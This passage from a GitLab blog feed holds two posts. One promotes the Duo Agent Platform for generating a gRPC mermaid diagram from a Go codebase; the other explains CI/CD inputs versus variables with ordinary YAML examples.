<p>My goal was simple: generate a clear diagram showing how the gRPC communication works, including what payloads are received, what actions are executed, and what responses are sent back.</p>
<p>Working in VS Code with the GitLab Workflow extension installed, I opened the project and crafted a specific prompt for Duo Agent Platform:</p>
<p>&quot;Can you prepare a mermaid diagram that shows the gRPC connection between duo-workflow-service and this project. It should show what this project receives in gRPC payload, and what actions it executes based on the payload, and what it sends back. Study internal/services/runner/runner.go, especially the Run method, and write the mermaid output to a grpc.md file.&quot;</p>
<p>Duo Agent Platform didn't just blindly execute my request — it began intelligently gathering context to create a comprehensive execution plan. The platform automatically:</p>
<ul>
<li>Searched through relevant Go files in the project</li>
<li>Read the specific file I mentioned (runner.go)</li>
<li>Identified additional files that would provide necessary context</li>
<li>Analyzed the codebase structure to understand the gRPC implementation</li>
</ul>
<p>This contextual awareness is what sets agentic AI tools apart from simple code generation tools. Instead of working in isolation, Duo Agent Platform understands the relationships between different components of your project.</p>
<h2>Collaborative refinement</h2>
<p>Rather than making assumptions, Duo Agent Platform is designed to keep a human in the loop at critical moments in task execution to deliver better results. In this scenario, the platform paused to ask clarifying questions about the level of detail I wanted.</p>
<p><strong>Agent:</strong> &quot;Should I include error handling details in the diagram?&quot;</p>
<p><strong>Me:</strong> &quot;Don't focus on error handling. Include all actions. Focus on gRPC payload.&quot;</p>
<p>This back-and-forth refinement is crucial. The agent isn't just executing commands — it's working with me to ensure the deliverable meets my specific requirements.</p>
<h2>Execution and results</h2>
<p>With the clarified requirements, Duo Agent Platform finalized its execution plan and requested confirmation before proceeding. I could have modified the approach at this stage, but the plan was perfectly aligned with what I needed.</p>
<p>The agent then executed each task in sequence, providing real-time progress updates. Within minutes, it had:</p>
<ul>
<li>Analyzed all relevant files across the project</li>
<li>Created comprehensive documentation with a detailed mermaid diagram</li>
<li>Saved everything to the requested grpc.md file</li>
<li>Included valuable context about outgoing payloads and connection management</li>
</ul>
<p>The resulting documentation wasn't just a basic diagram — it was thorough, accurate, and immediately useful for understanding the system architecture.</p>
<h2>Reviewing the output</h2>
<p>Here's the actual mermaid diagram that Duo Agent Platform created, showing the complete gRPC communication flow:</p>
<pre><code class="language-mermaid">sequenceDiagram
participant DWS as duo-workflow-service
participant DWE as duo-workflow-executor
participant Runner as ExecutionRunner
participant ActionExecutor as Action Executor
participant FileSystem as File System/Commands


Note over DWS, DWE: gRPC Bidirectional Streaming (ExecuteWorkflow)

%% Connection Establishment
DWE-&gt;&gt;DWS: gRPC Connection with Headers
Note over DWE, DWS: Headers: authorization (Bearer token)&lt;br/&gt;x-gitlab-authentication-type: oidc&lt;br/&gt;x-gitlab-realm, x-gitlab-global-user-id&lt;br/&gt;x-gitlab-oauth-token, x-gitlab-base-url&lt;br/&gt;x-gitlab-instance-id, x-request-id&lt;br/&gt;x-gitlab-namespace-id, x-gitlab-project-id


%% Workflow Start Request
DWE-&gt;&gt;DWS: ClientEvent{StartWorkflowRequest}
Note over DWE, DWS: StartWorkflowRequest:&lt;br/&gt;- ClientVersion&lt;br/&gt;- WorkflowDefinition&lt;br/&gt;- Goal&lt;br/&gt;- WorkflowID&lt;br/&gt;- WorkflowMetadata&lt;br/&gt;- ClientCapabilities[]


%% Action Processing Loop
loop Action Processing
    DWS-&gt;&gt;DWE: Action Message
    Note over DWS, DWE: Action Types:&lt;br/&gt;- Action_RunCommand {program, flags[], arguments[]}&lt;br/&gt;- Action_RunGitCommand {command, arguments[], repositoryUrl}&lt;br/&gt;- Action_RunReadFile {filepath}&lt;br/&gt;- Action_RunWriteFile {filepath, contents}&lt;br/&gt;- Action_RunEditFile {filepath, oldString, newString}&lt;br/&gt;- Action_RunHTTPRequest {method, path, body}&lt;br/&gt;- Action_ListDirectory {directory}&lt;br/&gt;- Action_FindFiles {namePattern}&lt;br/&gt;- Action_Grep {searchDirectory, pattern, caseInsensitive}&lt;br/&gt;- Action_NewCheckpoint {}&lt;br/&gt;- Action_RunMCPTool {}


    DWE-&gt;&gt;Runner: Receive Action
    Runner-&gt;&gt;Runner: processWorkflowActions()
    Runner-&gt;&gt;ActionExecutor: executeAction(ctx, action)
    
    alt Action_RunCommand
        ActionExecutor-&gt;&gt;FileSystem: Execute Shell Command
        Note over ActionExecutor, FileSystem: Executes: program + flags + arguments&lt;br/&gt;in basePath directory
        FileSystem--&gt;&gt;ActionExecutor: Command Output + Exit Code
    
    else Action_RunReadFile
        ActionExecutor-&gt;&gt;FileSystem: Read File
        Note over ActionExecutor, FileSystem: Check gitignore rules&lt;br/&gt;Read file contents
        FileSystem--&gt;&gt;ActionExecutor: File Contents
    
    else Action_RunWriteFile
        ActionExecutor-&gt;&gt;FileSystem: Write File
        Note over ActionExecutor, FileSystem: Check gitignore rules&lt;br/&gt;Create/overwrite file
        FileSystem--&gt;&gt;ActionExecutor: Success/Error Message
    
    else Action_RunEditFile
        ActionExecutor-&gt;&gt;FileSystem: Edit File
        Note over ActionExecutor, FileSystem: Read → Replace oldString with newString → Write&lt;br/&gt;Check gitignore rules
        FileSystem--&gt;&gt;ActionExecutor: Edit Result Message
    
    else Action_RunGitCommand
        ActionExecutor-&gt;&gt;FileSystem: Execute Git Command 
        Note over ActionExecutor, FileSystem: Git operations with authentication&lt;br/&gt;Uses provided git config
        FileSystem--&gt;&gt;ActionExecutor: Git Command Output
    
    else Action_RunHTTPRequest
        ActionExecutor-&gt;&gt;DWS: HTTP Request to GitLab API
        Note over ActionExecutor, DWS: Method: GET/POST/PUT/DELETE&lt;br/&gt;Path: API endpoint&lt;br/&gt;Body: Request payload&lt;br/&gt;Headers: Authorization
        DWS--&gt;&gt;ActionExecutor: HTTP Response
    
    else Action_ListDirectory
        ActionExecutor-&gt;&gt;FileSystem: List Directory Contents
        Note over ActionExecutor, FileSystem: Respect gitignore rules
        FileSystem--&gt;&gt;ActionExecutor: Directory Listing
    
    else Action_FindFiles
        ActionExecutor-&gt;&gt;FileSystem: Find Files by Pattern
        Note over ActionExecutor, FileSystem: Recursive search with name pattern&lt;br/&gt;Respect gitignore rules
        FileSystem--&gt;&gt;ActionExecutor: File Paths List
    
    else Action_Grep
        ActionExecutor-&gt;&gt;FileSystem: Search Text Pattern
        Note over ActionExecutor, FileSystem: Recursive text search&lt;br/&gt;Case sensitive/insensitive option
        FileSystem--&gt;&gt;ActionExecutor: Search Results
    
    else Action_NewCheckpoint/Action_RunMCPTool
        ActionExecutor-&gt;&gt;ActionExecutor: No-op Action
        Note over ActionExecutor: Returns empty success result
    end


    ActionExecutor--&gt;&gt;Runner: Action Result (string)
    
    alt Result Size Check
        Runner-&gt;&gt;Runner: Check if result &gt; 4MB
        Note over Runner: If result exceeds MaxMessageSize (4MB)&lt;br/&gt;Replace with error message about size limit
    end


    Runner-&gt;&gt;DWE: ActionResponse
    DWE-&gt;&gt;DWS: ClientEvent{ActionResponse}
    Note over DWE, DWS: ActionResponse:&lt;br/&gt;- RequestID (matches Action.RequestID)&lt;br/&gt;- Response (execution result string)
end


%% Workflow Completion
DWE-&gt;&gt;DWS: CloseSend()
Note over DWE, DWS: Signal end of workflow execution


%% Analytics and Cleanup
Runner-&gt;&gt;Runner: Send Analytics Event (Finish)
DWE-&gt;&gt;DWE: Token Revocation (if enabled)
DWE-&gt;&gt;DWS: Close gRPC Connection
</code></pre>
<p>This diagram reveals several important architectural insights that would have taken considerable time to extract manually:</p>
<ul>
<li><strong>Bidirectional communication:</strong> The workflow executor both initiates requests and responds to service actions.</li>
<li><strong>Rich payload structure:</strong> Each action type has specific parameters and expected responses.</li>
<li><strong>Multiple integration points:</strong> The executor interacts with local filesystem, Git repositories, and GitLab APIs.</li>
<li><strong>Comprehensive action set:</strong> Nine different action types handle everything from file operations to HTTP requests.</li>
<li><strong>Proper lifecycle management:</strong> Clear connection establishment and teardown patterns.</li>
</ul>
<p>What impressed me most was how the agent automatically included the detailed payload structures for each action type. This level of detail transforms the diagram from a high-level overview into actionable documentation that other developers can immediately use.</p>
<h2>Looking ahead</h2>
<p>This demonstration represents just one use case for GitLab Duo Agent Platform. The same contextual understanding and collaborative approach that made documentation generation seamless can be applied to:</p>
<ul>
<li><strong>Code reviews:</strong> Agents can analyze merge requests with full project context</li>
<li><strong>Testing:</strong> Generate comprehensive test suites based on actual usage patterns</li>
<li><strong>Debugging:</strong> Trace issues across multiple services and components</li>
<li><strong>Security scanning:</strong> Identify vulnerabilities with understanding of your specific architecture</li>
<li><strong>CI/CD optimization:</strong> Improve pipeline performance based on historical data</li>
</ul>
<p>GitLab Duo Agent Platform will enter public beta soon, so <a href="https://about.gitlab.com/gitlab-duo/agent-platform/">join the waitlist today</a>.</p>
<p>Stay tuned to the <a href="https://about.gitlab.com/blog/">GitLab Blog</a> and social channels for additional updates. GitLab Duo Agent Platform is evolving rapidly with specialized agents, custom workflows, and community-driven extensions on the roadmap.</p>
<h2>Learn more</h2>
<ul>
<li><a href="https://about.gitlab.com/blog/agentic-ai-guides-and-resources/">Agentic AI guides and resources</a></li>
<li><a href="https://about.gitlab.com/blog/gitlab-duo-agent-platform-what-is-next-for-intelligent-devsecops/">GitLab Duo Agent Platform: What’s next for intelligent DevSecOps</a></li>
<li><a href="https://about.gitlab.com/topics/agentic-ai/">What is agentic AI?</a></li>
<li><a href="https://about.gitlab.com/the-source/ai/from-vibe-coding-to-agentic-ai-a-roadmap-for-technical-leaders/">From vibe coding to agentic AI: A roadmap for technical leaders</a></li>
</ul>
]]></content>
        <author>
            <name>Halil Coban</name>
            <uri>https://about.gitlab.com/blog/authors/halil-coban</uri>
        </author>
        <published>2025-07-07T00:00:00.000Z</published>
    </entry>
    <entry>
        <title type="html"><![CDATA[CI/CD inputs: Secure and preferred method to pass parameters to a pipeline]]></title>
        <id>https://about.gitlab.com/blog/ci-cd-inputs-secure-and-preferred-method-to-pass-parameters-to-a-pipeline/</id>
        <link href="https://about.gitlab.com/blog/ci-cd-inputs-secure-and-preferred-method-to-pass-parameters-to-a-pipeline/"/>
        <updated>2025-07-07T00:00:00.000Z</updated>
        <content type="html"><![CDATA[<p>GitLab CI/CD inputs represent the future of pipeline parameter passing. As
a purpose-built feature designed specifically for typed parameters with
validation, clear contracts, and enhanced security, inputs solve the
fundamental challenges that teams have been working around with variables
for years.</p>
<p>While CI/CD variables have served as the traditional method for passing parameters to pipelines, they were originally designed for storing configuration settings — not as a sophisticated parameter-passing mechanism for complex workflows. This fundamental mismatch has created reliability issues, security concerns, and maintenance overhead that inputs elegantly eliminate.</p>
<p>This article demonstrates why CI/CD inputs should be your preferred approach for pipeline parameters. You'll discover how inputs provide type safety, prevent common pipeline failures, eliminate variable collision issues, and create more maintainable automation. You'll also see practical examples of inputs in action and how they solve real-world challenges, which we hope will encourage you to transition from variable-based workarounds to input-powered reliability.</p>
<h2>The hidden costs of variable-based parameter passing</h2>
<p>The problems with using variables for parameter passing are numerous and frustrating.</p>
<p><strong>No type validation</strong></p>
<p>Variables are strings. There is no type validation, so a pipeline expecting a boolean or a number can silently receive an arbitrary string instead. This leads to unexpected failures deep into the pipeline execution. In a deployment workflow, for example, a critical production deployment can fail hours after it started because a boolean flag stored in a variable did not hold the expected value.</p>
<p><strong>Runtime mutability</strong></p>
<p>Variables can be modified throughout the pipeline runtime, creating unpredictable behavior when multiple jobs attempt to change the same values. For example, deploy_job_a sets <code>DEPLOY_ENV=staging</code>, but deploy_job_b changes the <code>DEPLOY_ENV</code> value to <code>production</code>.</p>
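<p>As a concrete (hypothetical) sketch of how this bites: a job can silently rewrite a variable for downstream jobs through a dotenv artifact, and the later job’s own <code>variables</code> block loses out because dotenv reports sit higher in the precedence order:</p>
<pre><code class="language-yaml">
# Hypothetical jobs illustrating runtime mutation of DEPLOY_ENV.
deploy_job_a:
  stage: build
  script:
    - echo &quot;DEPLOY_ENV=production&quot; &gt;&gt; build.env   # mutates the value mid-pipeline
  artifacts:
    reports:
      dotenv: build.env

deploy_job_b:
  stage: deploy
  variables:
    DEPLOY_ENV: staging    # looks authoritative, but the dotenv report overrides it
  script:
    - echo &quot;Deploying to $DEPLOY_ENV&quot;   # deploys to production, not staging
</code></pre>
<p>Nothing in <code>deploy_job_b</code>’s definition hints that its value was overwritten upstream.</p>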
<p><strong>Security risks</strong></p>
<p>Security concerns arise because variables intended as simple parameters often receive the same access permissions as sensitive secrets. There's no clear contract defining what parameters a pipeline expects, their types, or their default values. A simple <code>BUILD_TYPE</code> parameter that seems innocuous at first glance can suddenly have access to production secrets, simply because variables do not inherently distinguish between parameters and sensitive data.</p>
<p>Perhaps most problematically, error detection happens too late in the process. A misconfigured variable might not cause a failure until minutes or even hours into a pipeline run, wasting valuable CI/CD resources and developer time. Teams have developed elaborate workarounds such as custom validation scripts, extensive documentation, and complex naming conventions just to make variable-based parameter passing somewhat reliable.</p>
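<p>Those workarounds are themselves code to maintain. A typical hand-rolled guard (hypothetical job name; the variable names match the examples later in this post) is a validation job in the <code>.pre</code> stage so that bad parameters at least fail fast:</p>
<pre><code class="language-yaml">
# Hypothetical workaround: manual parameter validation before any real work.
validate_parameters:
  stage: .pre   # runs before all other stages
  script:
    - |
      case &quot;$ENABLE_TESTS&quot; in
        true|false) ;;
        *) echo &quot;ENABLE_TESTS must be true or false, got: $ENABLE_TESTS&quot;; exit 1 ;;
      esac
    - |
      if ! [ &quot;$MAX_RETRIES&quot; -ge 0 ] 2&gt;/dev/null; then
        echo &quot;MAX_RETRIES must be a non-negative integer, got: $MAX_RETRIES&quot;; exit 1
      fi
</code></pre>
<p>Every pipeline that consumes these variables needs its own copy of this boilerplate; with inputs, the types are declared once and enforced automatically at pipeline creation.</p>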
<p>Many users have requested local debugging capabilities to test pipeline configurations before deployment. While this seems like an obvious solution, it quickly breaks down in practice. Enterprise CI/CD workflows integrate with dozens of external systems — cloud providers, artifact repositories, security scanners, deployment targets — that simply can't be replicated locally. Even if they could, the complexity would make local testing environments nearly impossible to maintain. This mismatch forced us to reframe the problem entirely. Instead of asking &quot;How can we test pipelines locally?&quot; we started asking &quot;How can we prevent configuration issues caused by variable-based parameter passing before users run a CI/CD automation workflow?&quot;</p>
<h2>Understanding variable precedence</h2>
<p>GitLab's variable system includes multiple <a href="https://docs.gitlab.com/ci/variables/#cicd-variable-precedence">precedence levels</a> to provide flexibility for different use cases. While this system serves many valid scenarios like allowing administrators to set instance- or group-wide defaults while letting individual projects override them when needed, it can create challenges when building reusable pipeline components.</p>
<p>When creating components or templates that will be used across different projects and groups, the variable precedence hierarchy can make behavior less predictable. For example, a template that works perfectly in one project might behave differently in another due to group- or instance-level variable overrides that aren't visible in a pipeline configuration.</p>
<p>When including multiple templates, it can also be challenging to track which variables are being set where and how they might interact.</p>
<p>In addition, component authors need to document not just which variables their template uses, but also potential conflicts with variables that might be defined at higher precedence levels.</p>
<h3>Variable precedence examples</h3>
<p><strong>Main pipeline file (<code>.gitlab-ci.yml</code>):</strong></p>
<pre><code class="language-yaml">
variables:
  ENVIRONMENT: production  # Top-level default for all jobs
  DATABASE_URL: prod-db.example.com

include:
  - local: 'templates/test-template.yml'
  - local: 'templates/deploy-template.yml'
</code></pre>
<p><strong>Test template (<code>templates/test-template.yml</code>):</strong></p>
<pre><code class="language-yaml">
run-tests:
  variables:
    ENVIRONMENT: test  # Job-level variable overrides the default
  script:
    - echo &quot;Running tests in $ENVIRONMENT environment&quot;  
    - echo &quot;Database URL is $DATABASE_URL&quot;  # Still inherits prod-db.example.com!
    - run-integration-tests --env=$ENVIRONMENT --db=$DATABASE_URL
    # Issue: Tests run in &quot;test&quot; environment but against production database

</code></pre>
<p><strong>Deploy template (<code>templates/deploy-template.yml</code>):</strong></p>
<pre><code class="language-yaml">
deploy-app:
  script:
    - echo &quot;Deploying to $ENVIRONMENT&quot;  # Uses production (top-level default)
    - echo &quot;Database URL is $DATABASE_URL&quot;  # Uses prod-db.example.com
    - deploy --target=$ENVIRONMENT --db=$DATABASE_URL
    # This will deploy to production as intended
</code></pre>
<p><strong>The challenges in this example:</strong></p>
<ol>
<li>
<p>Partial inheritance: The test job gets <code>ENVIRONMENT=test</code> but still inherits <code>DATABASE_URL=prod-db.example.com</code>.</p>
</li>
<li>
<p>Coordination complexity: Template authors must know what top-level variables exist and might conflict.</p>
</li>
<li>
<p>Override behavior: Job-level variables with the same name override defaults, but this isn't always obvious.</p>
</li>
<li>
<p>Hidden dependencies: Templates become dependent on the main pipeline's variable names.</p>
</li>
</ol>
<p>GitLab recognized these pain points and introduced <a href="https://docs.gitlab.com/ee/ci/inputs/">CI/CD inputs</a> as a purpose-built solution for passing parameters to pipelines, offering typed parameters with built-in validation that occurs at pipeline creation time rather than during execution.</p>
<h2>CI/CD inputs fundamentals</h2>
<p>Inputs provide typed parameters for reusable pipeline configuration with built-in validation at pipeline creation time, designed specifically for defining values when the pipeline runs. They create a clear contract between the pipeline consumer and the configuration, explicitly defining what parameters are expected, their types, and constraints.</p>
<h3>Configuration flexibility and scope</h3>
<p>One of the advantages of inputs is their configuration-time flexibility. Inputs are evaluated and interpolated during pipeline creation using the interpolation format <code>$[[ inputs.input-id ]]</code>, meaning they can be used anywhere in your pipeline configuration — including job names, rules conditions, images, and any other YAML configuration element. This eliminates the long-standing limitation of variable interpolation in certain contexts.</p>
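<p>As a quick (hypothetical) component sketch, an input can parameterize both the job’s <code>image</code> and a <code>rules</code> condition, two places where runtime variable expansion has historically been limited:</p>
<pre><code class="language-yaml">
# Hypothetical component: input values can land anywhere in the YAML,
# because interpolation happens at pipeline creation time.
spec:
  inputs:
    node_version:
      type: string
      default: '22'
    release_branch:
      type: string
      default: main
---
build:
  image: node:$[[ inputs.node_version ]]
  rules:
    - if: $CI_COMMIT_BRANCH == &quot;$[[ inputs.release_branch ]]&quot;
  script:
    - npm ci
    - npm run build
</code></pre>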
<p>One common use case we've seen is that users define their job names like <code>test-$[[ inputs.environment ]]-deployment</code>.</p>
<p>When using inputs in job names, you can prevent naming conflicts when the same component is included multiple times in a single pipeline. Without this capability, including the same component twice would result in job name collisions, with the second inclusion overwriting the first. Input-based job names ensure each inclusion creates uniquely named jobs.</p>
<p><strong>Before inputs:</strong></p>
<pre><code class="language-yaml">
test-service:
  variables:
    SERVICE_NAME: auth-service
    ENVIRONMENT: staging
  script:
    - run-tests-for $SERVICE_NAME in $ENVIRONMENT
</code></pre>
<p><strong>With inputs:</strong></p>
<pre><code class="language-yaml">
spec:
  inputs:
    environment:
      type: string
    service_name:
      type: string
---

test-$[[ inputs.service_name ]]-$[[ inputs.environment ]]:
  script:
    - run-tests-for $[[ inputs.service_name ]] in $[[ inputs.environment ]]
</code></pre>
<p>When included multiple times with different inputs, this creates jobs like <code>test-auth-service-staging</code>, <code>test-payment-service-production</code>, and <code>test-notification-service-development</code>. Each job has a unique, meaningful name that clearly indicates its purpose, making pipeline visualization much clearer than having multiple jobs with identical names that would overwrite each other.</p>
<p>Now let's go back to the first example at the top of this article and apply inputs. One immediate benefit is that, instead of maintaining multiple template files, we can use a single reusable template with different input values:</p>
<pre><code class="language-yaml">
spec:
  inputs:
    environment:
      type: string
    database_url:
      type: string
    action:
      type: string
---

$[[ inputs.action ]]-$[[ inputs.environment ]]:
  script:
    - echo &quot;Running $[[ inputs.action ]] in $[[ inputs.environment ]] environment&quot;
    - echo &quot;Database URL is $[[ inputs.database_url ]]&quot;
    - run-$[[ inputs.action ]] --env=$[[ inputs.environment ]] --db=$[[ inputs.database_url ]]
</code></pre>
<p>And in the main <code>.gitlab-ci.yml</code> file we can include it twice (or more) with different values, making sure we avoid naming collisions:</p>
<pre><code class="language-yaml">
include:
  - local: 'templates/environment-template.yml'
    inputs:
      environment: test
      database_url: test-db.example.com
      action: tests
  - local: 'templates/environment-template.yml'
    inputs:
      environment: production
      database_url: prod-db.example.com
      action: deploy
</code></pre>
<p><strong>The result:</strong> Instead of maintaining separate YAML files for testing and deployment jobs, you now have a single reusable template that handles both use cases safely. This approach scales to any number of environments or job types — reducing maintenance overhead, eliminating code duplication, and ensuring consistency across your entire pipeline configuration. One template to maintain instead of many, with zero risk of variable collision or configuration drift.</p>
<h3>Validation and type safety</h3>
<p>Another key difference between variables and inputs lies in validation capabilities. Inputs support different value types, including strings, numbers, booleans, and arrays, with validation occurring immediately when the pipeline is created. If you define an input as a boolean but pass a string, GitLab will reject the pipeline before any jobs execute, saving time and resources.</p>
<p>Here is an example of the enormous benefit of type validation.</p>
<p><strong>Without type validation (variables):</strong></p>
<pre><code class="language-yaml">
variables:
  ENABLE_TESTS: &quot;true&quot;  # Always a string
  MAX_RETRIES: &quot;3&quot;      # Always a string

deploy_job:
  script:
    - if [ &quot;$ENABLE_TESTS&quot; = true ]; then echo &quot;Running tests&quot;; fi  # Silently skipped for &quot;yes&quot;, &quot;True&quot;, etc.
    - retry_count=$((MAX_RETRIES + 1))  # Errors at runtime if the value is not numeric

</code></pre>
<p><strong>Problem:</strong> Nothing validates these strings. Any value other than exactly <code>&quot;true&quot;</code> (such as <code>&quot;yes&quot;</code> or <code>&quot;True&quot;</code>) silently skips the tests, and a non-numeric <code>MAX_RETRIES</code> only surfaces as an error at runtime.</p>
<p><strong>With type validation (inputs):</strong></p>
<pre><code class="language-yaml">
spec:
  inputs:
    enable_tests:
      type: boolean
      default: true
    max_retries:
      type: number
      default: 3
---

deploy_job:
  script:
    - if [ &quot;$[[ inputs.enable_tests ]]&quot; = true ]; then echo &quot;Running tests&quot;; fi  # Value is guaranteed to be true or false
    - retry_count=$(($[[ inputs.max_retries ]] + 1))    # Math works: 4

</code></pre>
<p><strong>Real-world impact of a variable type validation failure</strong>: A developer or an automated process triggers a GitLab CI/CD pipeline with <code>ENABLE_TESTS = yes</code> instead of <code>true</code>. If the deployment job starts 30 minutes or longer into the pipeline run, only then does the deployment script try to evaluate the boolean and fail.</p>
<p>Imagine the impact in terms of time-to-market and, of course, developer time spent debugging why a seemingly basic deploy job failed.</p>
<p>With typed inputs, GitLab CI/CD immediately rejects the pipeline and provides an explicit error message about the type mismatch.</p>
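<p>For example, given the spec above, an include that passes mistyped values is rejected at pipeline creation, before any job runs (the template path here is illustrative):</p>
<pre><code class="language-yaml">
include:
  - local: 'templates/deploy-template.yml'
    inputs:
      enable_tests: &quot;yes&quot;  # Rejected: enable_tests expects a boolean
      max_retries: three       # Rejected: max_retries expects a number
</code></pre>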
<h3>Security and access control</h3>
<p>Inputs provide enhanced security through controlled parameter passing: explicit contracts define exactly what values are expected and allowed, creating clear boundaries around the parameters passed to the pipeline. In addition, inputs are immutable. Once the pipeline starts, they cannot be modified during execution, providing predictable behavior throughout the pipeline lifecycle and eliminating the security risks that come from runtime variable manipulation.</p>
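<p>You can tighten the contract even further with the <code>options</code> keyword, which restricts an input to an explicit allow-list of values. A minimal sketch (job and input names are illustrative):</p>
<pre><code class="language-yaml">
spec:
  inputs:
    environment:
      type: string
      options: ['staging', 'production']  # any other value is rejected at pipeline creation
---

deploy:
  script:
    - echo &quot;Deploying to $[[ inputs.environment ]]&quot;
</code></pre>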
<h3>Scope and lifecycle</h3>
<p>When you define variables using the <code>variables:</code> keyword at the top level of your <code>.gitlab-ci.yml</code> file, these variables become defaults for all jobs in your entire pipeline. When you include templates, you must consider what variables you've defined globally, as they can interact with the template's expected behavior through GitLab's variable precedence order.</p>
<p>Inputs are defined in CI configuration files (e.g. components or templates) and assigned values when a pipeline is triggered, allowing you to customize reusable CI configurations. They exist solely for pipeline creation and configuration time, scoped to the CI configuration file where they're defined, and become immutable references once the pipeline begins execution. Since each component maintains its own inputs, there is no risk of inputs interfering with other components or templates in your pipeline, eliminating variable collision and override issues that can occur with variable-based approaches.</p>
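<p>To illustrate the difference in scope (file names hypothetical): a top-level variable silently becomes a default for every job in the pipeline, including jobs defined in included files, while an input never leaves the configuration file that declares it:</p>
<pre><code class="language-yaml">
# .gitlab-ci.yml
variables:
  IMAGE_TAG: latest   # default for ALL jobs, including those in included templates

include:
  - local: 'templates/build.yml'   # jobs defined here also inherit IMAGE_TAG
</code></pre>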
<h2>Working with variables and inputs together</h2>
<p>We recognize that teams have extensive investments in their variable-based workflows, and migration to inputs doesn't happen overnight. That's why we've developed capabilities that allow inputs and variables to work seamlessly together, providing a bridge between existing variables and the benefits of inputs while overcoming some key challenges in variable expansion.</p>
<p>Let's look at this real-world example.</p>
<p><strong>Variable expansion in rules conditions</strong></p>
<p>A common challenge occurs when using variables that contain other variable references in <code>rules:if</code> conditions. GitLab only expands variables one level deep during rule evaluation, which can lead to unexpected behavior:</p>
<pre><code class="language-yaml"># This doesn't work as expected

variables:
  TARGET_ENV:
    value: &quot;${CI_COMMIT_REF_SLUG}&quot;

deploy-job:
  rules:
    - if: '$TARGET_ENV == &quot;production&quot;'  # Compares &quot;${CI_COMMIT_REF_SLUG}&quot; != &quot;production&quot;
      variables:
        DEPLOY_MODE: &quot;blue-green&quot;
</code></pre>
<p>The <code>expand_vars</code> function solves this by forcing proper variable expansion in inputs:</p>
<pre><code class="language-yaml">spec:
  inputs:
    target_environment:
      description: &quot;Target deployment environment&quot;
      default: &quot;${CI_COMMIT_REF_SLUG}&quot;
---


deploy-job:
  rules:
    - if: '&quot;$[[ inputs.target_environment | expand_vars ]]&quot; == &quot;production&quot;'
      variables:
        DEPLOY_MODE: &quot;blue-green&quot;
        APPROVAL_REQUIRED: &quot;true&quot;
    - when: always
      variables:
        DEPLOY_MODE: &quot;rolling&quot;
        APPROVAL_REQUIRED: &quot;false&quot;
  script:
    - echo &quot;Target: $[[ inputs.target_environment | expand_vars ]]&quot;
    - echo &quot;Deploy mode: ${DEPLOY_MODE}&quot;
</code></pre>
<h3>Why this matters</h3>
<p>Without <code>expand_vars</code>, rule conditions evaluate against the literal variable reference (like <code>&quot;${CI_COMMIT_REF_SLUG}&quot;</code>) rather than the expanded value (like <code>&quot;production&quot;</code>). This leads to rules that never match when you expect them to, breaking conditional pipeline logic.</p>
<p><strong>Important notes about expand_vars:</strong></p>
<ul>
<li>
<p>Only variables that can be used with the <code>include</code> keyword are supported</p>
</li>
<li>
<p>Variables must be unmasked (not marked as protected/masked)</p>
</li>
<li>
<p>Nested variable expansion is not supported</p>
</li>
<li>
<p>Rule conditions using <code>expand_vars</code> must be properly quoted: <code>'&quot;$[[ inputs.name | expand_vars ]]&quot; == &quot;value&quot;'</code></p>
</li>
</ul>
<p>This pattern solves the single-level variable expansion limitation, working for any conditional logic that requires comparing fully resolved variable values.</p>
<h3>Function chaining for advanced processing</h3>
<p>Along with <code>expand_vars</code>, you can use functions like <code>truncate</code> to shorten values for compliance with naming restrictions (such as Kubernetes resource names), creating sophisticated parameter processing pipelines while maintaining input safety and predictability.</p>
<pre><code class="language-yaml">
spec:  
  inputs:
    service_identifier:
      default: 'service-$CI_PROJECT_NAME-$CI_COMMIT_REF_SLUG'
---

create-resource:
  script:
    - resource_name=$[[ inputs.service_identifier | expand_vars | truncate(0,50) ]]
</code></pre>
<p>This integration capability allows you to adopt inputs gradually while leveraging your existing variable infrastructure, making the migration path much smoother.</p>
<h3>From components only to CI pipelines</h3>
<p>Up until GitLab 17.11, GitLab users were able to use inputs only in components and templates through the <code>include:</code> syntax. This limited their use to reusable CI/CD configurations, but didn't address the broader need for dynamic pipeline customization.</p>
<h3>Pipeline-wide inputs support</h3>
<p>Starting with GitLab 17.11, users can now use inputs to safely modify pipeline behavior across all pipeline execution contexts, replacing the traditional reliance on pipeline variables. This expanded support includes:</p>
<ul>
<li>
<p>Scheduled pipelines: Define inputs with defaults for automated pipeline runs while allowing manual override when needed.</p>
</li>
<li>
<p>Downstream pipelines: Pass structured inputs to child and multi-project pipelines with proper validation and type safety.</p>
</li>
<li>
<p>Manual pipelines: Present users with a clean, validated form interface.</p>
</li>
</ul>
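<p>As a sketch of the downstream case (the file path and input names are illustrative), a trigger job can pass typed inputs to a child pipeline, which validates them at creation just as an include would:</p>
<pre><code class="language-yaml">
trigger-child:
  trigger:
    include:
      - local: 'pipelines/child-pipeline.yml'
        inputs:
          environment: staging
          run_smoke_tests: true
</code></pre>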
<p>These enhancements, with more to follow, allow teams to gradually modernize their pipelines while maintaining backward compatibility. Once inputs are fully adopted, users can disable pipeline variables to ensure a more secure and predictable CI/CD environment.</p>
<h2>Summary</h2>
<p>The transition from variables to inputs represents more than just a technical upgrade — it's a shift toward more maintainable, predictable, and secure CI/CD pipelines. While variables continue to serve important purposes for configuration, inputs provide the parameter-passing capabilities that teams have been working around for years.</p>
<p>We understand that variables are deeply embedded in existing workflows, which is why we've built bridges between the two systems. The <code>expand_vars</code> function and other input capabilities allow you to adopt inputs gradually while leveraging your existing variable infrastructure.</p>
<p>By starting with new components and templates, then gradually migrating high-impact workflows, you'll quickly see the benefits of clearer contracts, earlier error detection, and more reliable automation that scales across your organization. Additionally, moving to inputs creates an excellent foundation for leveraging <a href="https://gitlab.com/explore/catalog">GitLab's CI/CD Catalog</a>, where reusable components with typed interfaces become powerful building blocks for your DevOps workflows. But more on that in our next blog post.</p>
<p>Your future self and your teammates will thank you for the clarity and reliability that inputs bring to your CI/CD workflows, while still being able to work with the variable systems you've already invested in.</p>
<h2>What's next</h2>
<p>Looking ahead, we're expanding inputs to solve two key challenges: enhancing pipeline triggering with cascading options that <a href="https://gitlab.com/gitlab-org/gitlab/-/issues/520094">dynamically adjust based on user selections</a>, and providing job-level inputs that allow users to <a href="https://gitlab.com/groups/gitlab-org/-/epics/17833">retry individual jobs with different parameter values</a>. We encourage you to follow these discussions, share your feedback, and contribute to shaping these features. You can also provide general feedback on CI/CD inputs through our <a href="https://gitlab.com/gitlab-org/gitlab/-/issues/407556">feedback issue</a>.</p>
<h2>Read more</h2>
<ul>
<li><a href="https://about.gitlab.com/blog/how-to-include-file-references-in-your-ci-cd-components/">How to include file references in your CI/CD components</a></li>
<li><a href="https://docs.gitlab.com/ci/inputs/">CI/CD inputs documentation</a></li>
